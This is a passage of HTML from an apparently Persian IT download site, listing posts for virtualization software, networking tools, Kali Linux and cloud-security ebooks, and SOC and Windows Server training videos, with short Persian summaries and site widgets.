vSphere 6.7 &#8211; Second Edition </a> </h2> </div> </article > <article class="post-15052 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-1 main-term-100"> <div class="item-inner clearfix"> <div class="featured clearfix"> <a title="Learning Kali Linux: Security Testing, Penetration Testing, and Ethical Hacking" data-src="https://technet24.ir/wp-content/uploads/2018/07/Learning-Kali-Linux-Security-Testing-Penetration-Testing-and-Ethical-Hacking-368x430.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2018\/07\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;Learning-Kali-Linux-Security-Testing-Penetration-Testing-and-Ethical-Hacking-180x217.jpg&quot;,&quot;267&quot;:&quot;Learning-Kali-Linux-Security-Testing-Penetration-Testing-and-Ethical-Hacking-267x322.jpg&quot;,&quot;368&quot;:&quot;Learning-Kali-Linux-Security-Testing-Penetration-Testing-and-Ethical-Hacking-368x430.jpg&quot;,&quot;750&quot;:&quot;Learning-Kali-Linux-Security-Testing-Penetration-Testing-and-Ethical-Hacking.jpg&quot;}}" class="img-holder" href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-learning-kali-linux-security-testing-penetration-testing-and-ethical-hacking-15052"></a> </div> <h2 class="title"> <a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-learning-kali-linux-security-testing-penetration-testing-and-ethical-hacking-15052" class="post-url post-title"> Learning Kali Linux: Security Testing, Penetration&hellip; </a> </h2> </div> </article > <article class="post-8372 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-1 main-term-100"> <div class="item-inner clearfix"> <div class="featured clearfix"> <a title="PowerShell: Automating Administrative Tasks &#8211; دانلود آموزش خودکار سازی وظایف با پاورشل" data-src="https://technet24.ir/wp-content/uploads/2017/03/PowerShell-Automating-Administrative-Tasks-368x436.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2017\/03\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;PowerShell-Automating-Administrative-Tasks-180x217.jpg&quot;,&quot;267&quot;:&quot;PowerShell-Automating-Administrative-Tasks-267x322.jpg&quot;,&quot;368&quot;:&quot;PowerShell-Automating-Administrative-Tasks-368x436.jpg&quot;,&quot;700&quot;:&quot;PowerShell-Automating-Administrative-Tasks.jpg&quot;}}" class="img-holder" href="https://technet24.ir/powershell-automating-administrative-tasks-download-8372"></a> </div> <h2 class="title"> <a href="https://technet24.ir/powershell-automating-administrative-tasks-download-8372" class="post-url post-title"> PowerShell: Automating Administrative Tasks &#8211;&hellip; </a> </h2> </div> </article > </div> </div> <div class="bs-shortcode bs-popular-categories bscb-78862 vc_custom_1517680594598 have_bg"> <h3 class="section-heading sh-t2 sh-s1"> <span class="h-text"><i class="bf-icon fa fa-fire"></i> Popular Categories</span> </h3> <style> .bscb-78862.bscb-78862 .section-heading.sh-t2 .bs-pretty-tabs-container,.bscb-78862.bscb-78862 .section-heading.sh-t2 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-78862.bscb-78862 .section-heading.sh-t5 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-78862.bscb-78862 .section-heading.sh-t7 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-78862.bscb-78862 .section-heading.sh-t7 > a > .h-text,.bscb-78862.bscb-78862 .section-heading.sh-t7 > .h-text{background-color:#ffffff} </style> <ul class="bs-popular-terms-list"> <li class="bs-popular-term-item term-item-94"> <a href="https://technet24.ir/category/download">Download<span class="term-count">1155</span></a> </li><li class="bs-popular-term-item term-item-100"> <a href="https://technet24.ir/category/ebooks">eBook<span class="term-count">571</span></a> </li><li class="bs-popular-term-item term-item-129"> <a href="https://technet24.ir/category/%d8%b4%d8%a8%da%a9%d9%87">Network<span class="term-count">478</span></a> </li><li class="bs-popular-term-item term-item-103"> <a href="https://technet24.ir/category/security">Security<span class="term-count">384</span></a> </li><li class="bs-popular-term-item term-item-2398"> <a href="https://technet24.ir/category/videos">Video<span class="term-count">332</span></a> </li><li class="bs-popular-term-item term-item-258"> <a href="https://technet24.ir/category/cisco">Cisco<span class="term-count">285</span></a> </li> </ul> </div> <div class="vc_wp_recentcomments wpb_content_element"><div class="widget widget_recent_comments"><h5 class="section-heading"><span class="h-text">Recent Comments</span></h5><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">technet24</span> در <a href="https://technet24.ir/implementing-windows-server-2019-high-availability-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d9%86%d8%ad%d9%88%d9%87-%d9%be%db%8c%d8%a7%d8%af%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d9%82%d8%a7%d8%a8%d9%84%db%8c-19382#comment-5924">Implementing Windows Server 2019 High Availability &#8211; آموزش نحوه پیاده سازی قابلیت تحمل خرابی در ویندوز سرور ۲۰۱۹</a></li><li class="recentcomments"><span class="comment-author-link">pentest2377</span> در <a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-%d8%b3%d8%b1%d9%88%db%8c%d8%b3-%d9%be%da%a9-hpe-service-pack-for-proliant-9872#comment-5923">Service Pack for ProLiant (SPP) Version 2019.03.1 &#8211; دانلود سرویس پک</a></li><li class="recentcomments"><span class="comment-author-link">احسان</span> در <a href="https://technet24.ir/a-beginners-guide-to-linux-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d9%84%db%8c%d9%86%d9%88%da%a9%d8%b3-%d8%a8%d8%b1%d8%a7%db%8c-%d9%85%d8%a8%d8%aa%d8%af%db%8c%d8%a7%d9%86-17765#comment-5922">A Beginners Guide to Linux &#8211; آموزش لینوکس برای مبتدیان</a></li><li class="recentcomments"><span class="comment-author-link">علی</span> در <a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-microsoft-sharepoint-server-2019-16276#comment-5921">Microsoft SharePoint Server 2019 &#8211; دانلود شیرپوینت سرور</a></li><li class="recentcomments"><span class="comment-author-link">ولید</span> در <a href="https://technet24.ir/implementing-windows-server-2019-high-availability-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d9%86%d8%ad%d9%88%d9%87-%d9%be%db%8c%d8%a7%d8%af%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d9%82%d8%a7%d8%a8%d9%84%db%8c-19382#comment-5920">Implementing Windows Server 2019 High Availability &#8211; آموزش نحوه پیاده سازی قابلیت تحمل خرابی در ویندوز سرور ۲۰۱۹</a></li></ul></div></div><div class="vc_wp_tagcloud wpb_content_element"></div> <div class="wpb_raw_code wpb_content_element wpb_raw_html vc_custom_1545582435152" > <div class="wpb_wrapper"> <a href="https://www.instagram.com/technet24/"><img src="https://technet24.ir/wp-content/uploads/2018/12/follow-us-on-instagram.png" /></a> </div> </div> </div></div><div class="wpb_column bs-vc-column vc_column_container vc_col-sm-8"><div class="bs-vc-wrapper wpb_wrapper"><div class="bscb-85885 vc_custom_1517773944722 have_bg bs-listing bs-listing-listing-blog-1 bs-listing-single-tab pagination-animate"> <style> .bscb-85885.bscb-85885 .section-heading.sh-t2 .bs-pretty-tabs-container,.bscb-85885.bscb-85885 .section-heading.sh-t2 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-85885.bscb-85885 .section-heading.sh-t5 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-85885.bscb-85885 .section-heading.sh-t7 .bs-pretty-tabs-container .bs-pretty-tabs-elements,.bscb-85885.bscb-85885 .section-heading.sh-t7 > a > .h-text,.bscb-85885.bscb-85885 .section-heading.sh-t7 > .h-text{background-color:#ffffff} </style> <div class="bs-pagination-wrapper main-term-none more_btn bs-slider-first-item"> <div class="listing listing-blog listing-blog-5 clearfix columns-1"> <article class="post-13940 type-post format-standard has-post-thumbnail listing-item listing-item-blog listing-item-blog-5 main-term-94 bsw-8 "> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-94"><a href="https://technet24.ir/category/download">Download</a></span></div> <a title="VMware vCenter Server 6.7 U2a" data-src="https://technet24.ir/wp-content/uploads/2018/04/VMware-vCenter-Server-6.7_Download-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2018\/04\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;VMware-vCenter-Server-6.7_Download-210x136.jpg&quot;,&quot;279&quot;:&quot;VMware-vCenter-Server-6.7_Download-279x220.jpg&quot;,&quot;357&quot;:&quot;VMware-vCenter-Server-6.7_Download-357x210.jpg&quot;,&quot;750&quot;:&quot;VMware-vCenter-Server-6.7_Download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/vmware-vcenter-server-6-7-13940"></a> </div> <h2 class="title"> <a href="https://technet24.ir/vmware-vcenter-server-6-7-13940" class="post-title post-url"> VMware vCenter Server 6.7 U2a </a> </h2> <div class="post-meta"> <a href="https://technet24.ir/author/technet24" title="مرور مقالات نویسنده" class="post-author-a"> <i class="post-author author"> technet24 </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-16T02:45:01+00:00">اردیبهشت ۲۶, ۱۳۹۸</time></span> <span class="views post-meta-views rank-3500" data-bpv-post="13940"><i class="bf-icon bsfi-fire-4"></i>46,343</span><div class="rating rating-stars"><span style="width: 100%;"></span></div><a href="https://technet24.ir/vmware-vcenter-server-6-7-13940#comments" title="دیدگاه خود را بنویسید: “VMware vCenter Server 6.7 U2a”" class="comments"><i class="fa fa-comments-o"></i> 9</a> </div> <div class="post-summary"> نرم افزار vSphere که محصول شرکت VMware است برای کارهای بسیار عظیم و سطح بالا که راه اندازی یک سیستم ابری وکلود می باشد مورد استفاده قرار می گیرد. اما استفاده آن در مقیاس کوچکتر برای راه اندازی سیستمهای مجازی می باشد. شرکت VMware نسخه جدید&hellip; <br><a class="read-more" href="https://technet24.ir/vmware-vcenter-server-6-7-13940">ادامه مطلب …</a> </div> </div> </article > <article class="post-19418 type-post format-standard has-post-thumbnail listing-item listing-item-blog listing-item-blog-5 main-term-100 bsw-8 "> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-100"><a href="https://technet24.ir/category/ebooks">eBook</a></span></div> <a title="CCSP Official (ISC)2 Practice Tests &#8211; کتاب تست و تمرین امنیت رایانش ابری" data-src="https://technet24.ir/wp-content/uploads/2019/05/CCSP-Official-ISC2-Practice-Tests-pdf-download-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;CCSP-Official-ISC2-Practice-Tests-pdf-download-210x136.jpg&quot;,&quot;279&quot;:&quot;CCSP-Official-ISC2-Practice-Tests-pdf-download-279x220.jpg&quot;,&quot;357&quot;:&quot;CCSP-Official-ISC2-Practice-Tests-pdf-download-357x210.jpg&quot;,&quot;750&quot;:&quot;CCSP-Official-ISC2-Practice-Tests-pdf-download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/ccsp-official-isc2-practice-tests-19418"></a> </div> <h2 class="title"> <a href="https://technet24.ir/ccsp-official-isc2-practice-tests-19418" class="post-title post-url"> CCSP Official (ISC)2 Practice Tests &#8211; کتاب تست و تمرین امنیت رایانش ابری </a> </h2> <div class="post-meta"> <a href="https://technet24.ir/author/technet24" title="مرور مقالات نویسنده" class="post-author-a"> <i class="post-author author"> technet24 </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-16T00:28:41+00:00">اردیبهشت ۲۶, ۱۳۹۸</time></span> <span class="views post-meta-views rank-default" data-bpv-post="19418"><i class="bf-icon fa fa-eye"></i>97</span><div class="rating rating-stars"><span style="width: 90%;"></span></div><a href="https://technet24.ir/ccsp-official-isc2-practice-tests-19418#respond" title="دیدگاه خود را بنویسید: “CCSP Official (ISC)2 Practice Tests &#8211; کتاب تست و تمرین امنیت رایانش ابری”" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> در کتاب تست و تمرین امنیت رایانش ابری CCSP Official (ISC)2 Practice Tests ، به بررسی مفاهیم معماری و الزامات طراحی امنیت رایانش ابری، امنیت داده های ابری، پلت فرم ابر و امنیت زیرساخت ها، امنیت برنامه های ابر، به همراه پاسخ به سوالات نقد و&hellip; <br><a class="read-more" href="https://technet24.ir/ccsp-official-isc2-practice-tests-19418">ادامه مطلب …</a> </div> </div> </article > <article class="post-19407 type-post format-standard has-post-thumbnail listing-item listing-item-blog listing-item-blog-5 main-term-2398 bsw-8 "> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-2398"><a href="https://technet24.ir/category/videos">Video</a></span></div> <a title="SOC Analyst Training with Hands-on to SIEM from Scratch" data-src="https://technet24.ir/wp-content/uploads/2019/05/SOC-Analyst-Training-with-Hands-on-to-SIEM-from-Scratch-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;SOC-Analyst-Training-with-Hands-on-to-SIEM-from-Scratch-210x136.jpg&quot;,&quot;279&quot;:&quot;SOC-Analyst-Training-with-Hands-on-to-SIEM-from-Scratch-279x220.jpg&quot;,&quot;357&quot;:&quot;SOC-Analyst-Training-with-Hands-on-to-SIEM-from-Scratch-357x210.jpg&quot;,&quot;750&quot;:&quot;SOC-Analyst-Training-with-Hands-on-to-SIEM-from-Scratch.jpg&quot;}}" class="img-holder" href="https://technet24.ir/soc-analyst-training-with-hands-on-to-siem-from-scratch-19407"></a> </div> <h2 class="title"> <a href="https://technet24.ir/soc-analyst-training-with-hands-on-to-siem-from-scratch-19407" class="post-title post-url"> SOC Analyst Training with Hands-on to SIEM from Scratch </a> </h2> <div class="post-meta"> <a href="https://technet24.ir/author/technet24" title="مرور مقالات نویسنده" class="post-author-a"> <i class="post-author author"> technet24 </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-15T13:15:32+00:00">اردیبهشت ۲۵, ۱۳۹۸</time></span> <span class="views post-meta-views rank-default" data-bpv-post="19407"><i class="bf-icon fa fa-eye"></i>358</span><div class="rating rating-stars"><span style="width: 90%;"></span></div><a href="https://technet24.ir/soc-analyst-training-with-hands-on-to-siem-from-scratch-19407#respond" title="دیدگاه خود را بنویسید: “SOC Analyst Training with Hands-on to SIEM from Scratch”" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> در مرکز عملیات امنیت SOC، به منظور بهره‌گیری از مکانیسم فرآیندگرا و هوشمند برای بررسی وقایع، مستندسازی رخدادها امنیتی و حوادث امنیتی، انجام اقدامات اصلاحی و پیشگیرانه و آنالیز این وقایع جهت اتخاذ تصمیمات لازم در سطح کل زیرساخت فناوری&hellip; <br><a class="read-more" href="https://technet24.ir/soc-analyst-training-with-hands-on-to-siem-from-scratch-19407">ادامه مطلب …</a> </div> </div> </article > <article class="post-15933 type-post format-standard has-post-thumbnail listing-item listing-item-blog listing-item-blog-5 main-term-94 bsw-8 "> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-94"><a href="https://technet24.ir/category/download">Download</a></span></div> <a title="دانلود GNS3 2.1.16" data-src="https://technet24.ir/wp-content/uploads/2018/10/GNS3-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2018\/10\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;GNS3-210x136.jpg&quot;,&quot;279&quot;:&quot;GNS3-279x220.jpg&quot;,&quot;357&quot;:&quot;GNS3-357x210.jpg&quot;,&quot;750&quot;:&quot;GNS3.jpg&quot;}}" class="img-holder" href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-gns3-15933"></a> </div> <h2 class="title"> <a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-gns3-15933" class="post-title post-url"> دانلود GNS3 2.1.16 </a> </h2> <div class="post-meta"> <a href="https://technet24.ir/author/technet24" title="مرور مقالات نویسنده" class="post-author-a"> <i class="post-author author"> technet24 </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-15T09:15:11+00:00">اردیبهشت ۲۵, ۱۳۹۸</time></span> <span class="views post-meta-views rank-3500" data-bpv-post="15933"><i class="bf-icon bsfi-fire-4"></i>14,317</span><div class="rating rating-stars"><span style="width: 90%;"></span></div><a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-gns3-15933#comments" title="دیدگاه خود را بنویسید: “دانلود GNS3 2.1.16”" class="comments"><i class="fa fa-comments-o"></i> 2</a> </div> <div class="post-summary"> نرم‌افزار GNS3 (جی‌ان‌اس۳) یک نرم افزار شبیه ساز شبکه است که امکان طراحی توپولوژی‌های پیچیده شبکه را فراهم می‌سازد. با استفاده از آخرین نسخه این برنامه قدرتمند می‌توانید عملیات شبیه سازی‌ را اجرا کنید و یا اینکه ایستگاه‎‌های کاری ساده و&hellip; <br><a class="read-more" href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-gns3-15933">ادامه مطلب …</a> </div> </div> </article > <article class="post-9872 type-post format-standard has-post-thumbnail listing-item listing-item-blog listing-item-blog-5 main-term-327 bsw-8 "> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-327"><a href="https://technet24.ir/category/hp-server">سرور HP</a></span></div> <a title="Service Pack for ProLiant (SPP) Version 2019.03.1 &#8211; دانلود سرویس پک" data-src="https://technet24.ir/wp-content/uploads/2018/12/HPE-Service-Pack-for-ProLiant-SPP_download-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2018\/12\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;HPE-Service-Pack-for-ProLiant-SPP_download-210x136.jpg&quot;,&quot;279&quot;:&quot;HPE-Service-Pack-for-ProLiant-SPP_download-279x220.jpg&quot;,&quot;357&quot;:&quot;HPE-Service-Pack-for-ProLiant-SPP_download-357x210.jpg&quot;,&quot;750&quot;:&quot;HPE-Service-Pack-for-ProLiant-SPP_download.jpg&quot;}}" class="img-holder" href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-%d8%b3%d8%b1%d9%88%db%8c%d8%b3-%d9%be%da%a9-hpe-service-pack-for-proliant-9872"></a> </div> <h2 class="title"> <a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-%d8%b3%d8%b1%d9%88%db%8c%d8%b3-%d9%be%da%a9-hpe-service-pack-for-proliant-9872" class="post-title post-url"> Service Pack for ProLiant (SPP) Version 2019.03.1 &#8211; دانلود سرویس پک </a> </h2> <div class="post-meta"> <a href="https://technet24.ir/author/technet24" title="مرور مقالات نویسنده" class="post-author-a"> <i class="post-author author"> technet24 </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-15T09:10:28+00:00">اردیبهشت ۲۵, ۱۳۹۸</time></span> <span class="views post-meta-views rank-3500" data-bpv-post="9872"><i class="bf-icon bsfi-fire-4"></i>36,292</span><div class="rating rating-stars"><span style="width: 100%;"></span></div><a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-%d8%b3%d8%b1%d9%88%db%8c%d8%b3-%d9%be%da%a9-hpe-service-pack-for-proliant-9872#comments" title="دیدگاه خود را بنویسید: “Service Pack for ProLiant (SPP) Version 2019.03.1 &#8211; دانلود سرویس پک”" class="comments"><i class="fa fa-comments-o"></i> 33</a> </div> <div class="post-summary"> شرکت HP سرویس پک سرورهای سری Proliant خود را که شامل Firmware جدید و System Software Maintenance میباشد سرویس پک ورژن HPE Service Pack for ProLiant (SPP) Version 2019.03.1 منتشر کرد. این سرویس پک بصورت یک فایل iso از طریق لینک های زیر قابل&hellip; <br><a class="read-more" href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-%d8%b3%d8%b1%d9%88%db%8c%d8%b3-%d9%be%da%a9-hpe-service-pack-for-proliant-9872">ادامه مطلب …</a> </div> </div> </article > <article class="post-9502 type-post format-standard has-post-thumbnail listing-item listing-item-blog listing-item-blog-5 main-term-94 bsw-8 "> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-94"><a href="https://technet24.ir/category/download">Download</a></span></div> <a title="VMware Workstation 15.1 Pro &#8211; دانلود" data-src="https://technet24.ir/wp-content/uploads/2017/09/VMware-Workstation-Pro-15-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2017\/09\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;VMware-Workstation-Pro-15-210x136.jpg&quot;,&quot;279&quot;:&quot;VMware-Workstation-Pro-15-279x220.jpg&quot;,&quot;357&quot;:&quot;VMware-Workstation-Pro-15-357x210.jpg&quot;,&quot;750&quot;:&quot;VMware-Workstation-Pro-15.jpg&quot;}}" class="img-holder" href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-vmware-workstation-9502"></a> </div> <h2 class="title"> <a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-vmware-workstation-9502" class="post-title post-url"> VMware Workstation 15.1 Pro &#8211; دانلود </a> </h2> <div class="post-meta"> <a href="https://technet24.ir/author/technet24" title="مرور مقالات نویسنده" class="post-author-a"> <i class="post-author author"> technet24 </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-14T23:45:40+00:00">اردیبهشت ۲۴, ۱۳۹۸</time></span> <span class="views post-meta-views rank-3500" data-bpv-post="9502"><i class="bf-icon bsfi-fire-4"></i>22,210</span><div class="rating rating-stars"><span style="width: 100%;"></span></div><a href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-vmware-workstation-9502#comments" title="دیدگاه خود را بنویسید: “VMware Workstation 15.1 Pro &#8211; دانلود”" class="comments"><i class="fa fa-comments-o"></i> 8</a> </div> <div class="post-summary"> VMware Workstation Pro v15 این نرم افزار با میلیون ها كاربر در سراسر دنیا، كارایی را در تولید نرم افزارها بهبود می بخشد، هزینه ها را كاهش می دهد و انعطاف پذیری را بالا می برد و راه امن تری را برای جواب گرفتن از برنامه ها پیش پای ما می&hellip; <br><a class="read-more" href="https://technet24.ir/%d8%af%d8%a7%d9%86%d9%84%d9%88%d8%af-vmware-workstation-9502">ادامه مطلب …</a> </div> </div> </article > <article class="post-19382 type-post format-standard has-post-thumbnail listing-item listing-item-blog listing-item-blog-5 main-term-2398 bsw-8 "> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-2398"><a href="https://technet24.ir/category/videos">Video</a></span></div> <a title="Implementing Windows Server 2019 High Availability &#8211; آموزش نحوه پیاده سازی قابلیت تحمل خرابی در ویندوز سرور ۲۰۱۹" data-src="https://technet24.ir/wp-content/uploads/2019/05/Implementing-Windows-Server-2019-High-Availability-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;Implementing-Windows-Server-2019-High-Availability-210x136.jpg&quot;,&quot;279&quot;:&quot;Implementing-Windows-Server-2019-High-Availability-279x220.jpg&quot;,&quot;357&quot;:&quot;Implementing-Windows-Server-2019-High-Availability-357x210.jpg&quot;,&quot;750&quot;:&quot;Implementing-Windows-Server-2019-High-Availability.jpg&quot;}}" class="img-holder" href="https://technet24.ir/implementing-windows-server-2019-high-availability-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d9%86%d8%ad%d9%88%d9%87-%d9%be%db%8c%d8%a7%d8%af%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d9%82%d8%a7%d8%a8%d9%84%db%8c-19382"></a> </div> <h2 class="title"> <a href="https://technet24.ir/implementing-windows-server-2019-high-availability-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d9%86%d8%ad%d9%88%d9%87-%d9%be%db%8c%d8%a7%d8%af%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d9%82%d8%a7%d8%a8%d9%84%db%8c-19382" class="post-title post-url"> Implementing Windows Server 2019 High Availability &#8211; آموزش نحوه پیاده سازی قابلیت تحمل خرابی&hellip; </a> </h2> <div class="post-meta"> <a href="https://technet24.ir/author/technet24" title="مرور مقالات نویسنده" class="post-author-a"> <i class="post-author author"> technet24 </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-14T09:47:53+00:00">اردیبهشت ۲۴, ۱۳۹۸</time></span> <span class="views post-meta-views rank-default" data-bpv-post="19382"><i class="bf-icon fa fa-eye"></i>361</span><div class="rating rating-stars"><span style="width: 80%;"></span></div><a href="https://technet24.ir/implementing-windows-server-2019-high-availability-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d9%86%d8%ad%d9%88%d9%87-%d9%be%db%8c%d8%a7%d8%af%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d9%82%d8%a7%d8%a8%d9%84%db%8c-19382#comments" title="دیدگاه خود را بنویسید: “Implementing Windows Server 2019 High Availability &#8211; آموزش نحوه پیاده سازی قابلیت تحمل خرابی در ویندوز سرور ۲۰۱۹”" class="comments"><i class="fa fa-comments-o"></i> 4</a> </div> <div class="post-summary"> در بیشتر مواقع در دسترسی بودن یک سرویس بسیار مهم و حیاتی می باشد، در دوره Implementing Windows Server 2019 High Availability به بررسی نحوه  آماده سازی ، پیکربندی، پیاده سازی و مدیریت قابلیت تحمل خرابی در ویندوز سرور 2019 به صورت جامع می&hellip; <br><a class="read-more" href="https://technet24.ir/implementing-windows-server-2019-high-availability-%d8%a2%d9%85%d9%88%d8%b2%d8%b4-%d9%86%d8%ad%d9%88%d9%87-%d9%be%db%8c%d8%a7%d8%af%d9%87-%d8%b3%d8%a7%d8%b2%db%8c-%d9%82%d8%a7%d8%a8%d9%84%db%8c-19382">ادامه مطلب …</a> </div> </div> </article > <article class="post-19374 type-post format-standard has-post-thumbnail listing-item listing-item-blog listing-item-blog-5 main-term-100 bsw-8 "> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-100"><a href="https://technet24.ir/category/ebooks">eBook</a></span></div> <a title="Mastering VMware Horizon 7.8 &#8211; Third Edition" data-src="https://technet24.ir/wp-content/uploads/2019/05/Mastering-VMware-Horizon-7.8-Third-Edition-pdf-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;Mastering-VMware-Horizon-7.8-Third-Edition-pdf-210x136.jpg&quot;,&quot;279&quot;:&quot;Mastering-VMware-Horizon-7.8-Third-Edition-pdf-279x220.jpg&quot;,&quot;357&quot;:&quot;Mastering-VMware-Horizon-7.8-Third-Edition-pdf-357x210.jpg&quot;,&quot;750&quot;:&quot;Mastering-VMware-Horizon-7.8-Third-Edition-pdf.jpg&quot;}}" class="img-holder" href="https://technet24.ir/mastering-vmware-horizon-7-8-third-edition-19374"></a> </div> <h2 class="title"> <a href="https://technet24.ir/mastering-vmware-horizon-7-8-third-edition-19374" class="post-title post-url"> Mastering VMware Horizon 7.8 &#8211; Third Edition </a> </h2> <div class="post-meta"> <a href="https://technet24.ir/author/technet24" title="مرور مقالات نویسنده" class="post-author-a"> <i class="post-author author"> technet24 </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-13T14:13:00+00:00">اردیبهشت ۲۳, ۱۳۹۸</time></span> <span class="views post-meta-views rank-default" data-bpv-post="19374"><i class="bf-icon fa fa-eye"></i>447</span><div class="rating rating-stars"><span style="width: 100%;"></span></div><a href="https://technet24.ir/mastering-vmware-horizon-7-8-third-edition-19374#respond" title="دیدگاه خود را بنویسید: “Mastering VMware Horizon 7.8 &#8211; Third Edition”" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> مجازی سازی دسکتاپ می تواند سخت باشد، اما VMware Horizon 7.8 همه چیز را تغییر داده است. در این کتاب Mastering VMware Horizon 7.8 ویرایش سوم نحوه پیکربندی VMware Horizon برای رفع نیاز های کاربران و نحوه تشخیص چگونگی بهینه سازی تصاویر دسكتاپ&hellip; <br><a class="read-more" href="https://technet24.ir/mastering-vmware-horizon-7-8-third-edition-19374">ادامه مطلب …</a> </div> </div> </article > <article class="post-13668 type-post format-standard has-post-thumbnail listing-item listing-item-blog listing-item-blog-5 main-term-94 bsw-8 "> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-94"><a href="https://technet24.ir/category/download">Download</a></span></div> <a title="SolarWinds Engineer&#8217;s Toolset 11.0.7 + لایسنس" data-src="https://technet24.ir/wp-content/uploads/2018/03/SolarWinds-Engineers-Toolset-download-license-357x210.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/technet24.ir\/wp-content\/uploads\/2018\/03\/&quot;,&quot;sizes&quot;:{&quot;210&quot;:&quot;SolarWinds-Engineers-Toolset-download-license-210x136.jpg&quot;,&quot;279&quot;:&quot;SolarWinds-Engineers-Toolset-download-license-279x220.jpg&quot;,&quot;357&quot;:&quot;SolarWinds-Engineers-Toolset-download-license-357x210.jpg&quot;,&quot;750&quot;:&quot;SolarWinds-Engineers-Toolset-download-license.jpg&quot;}}" class="img-holder" 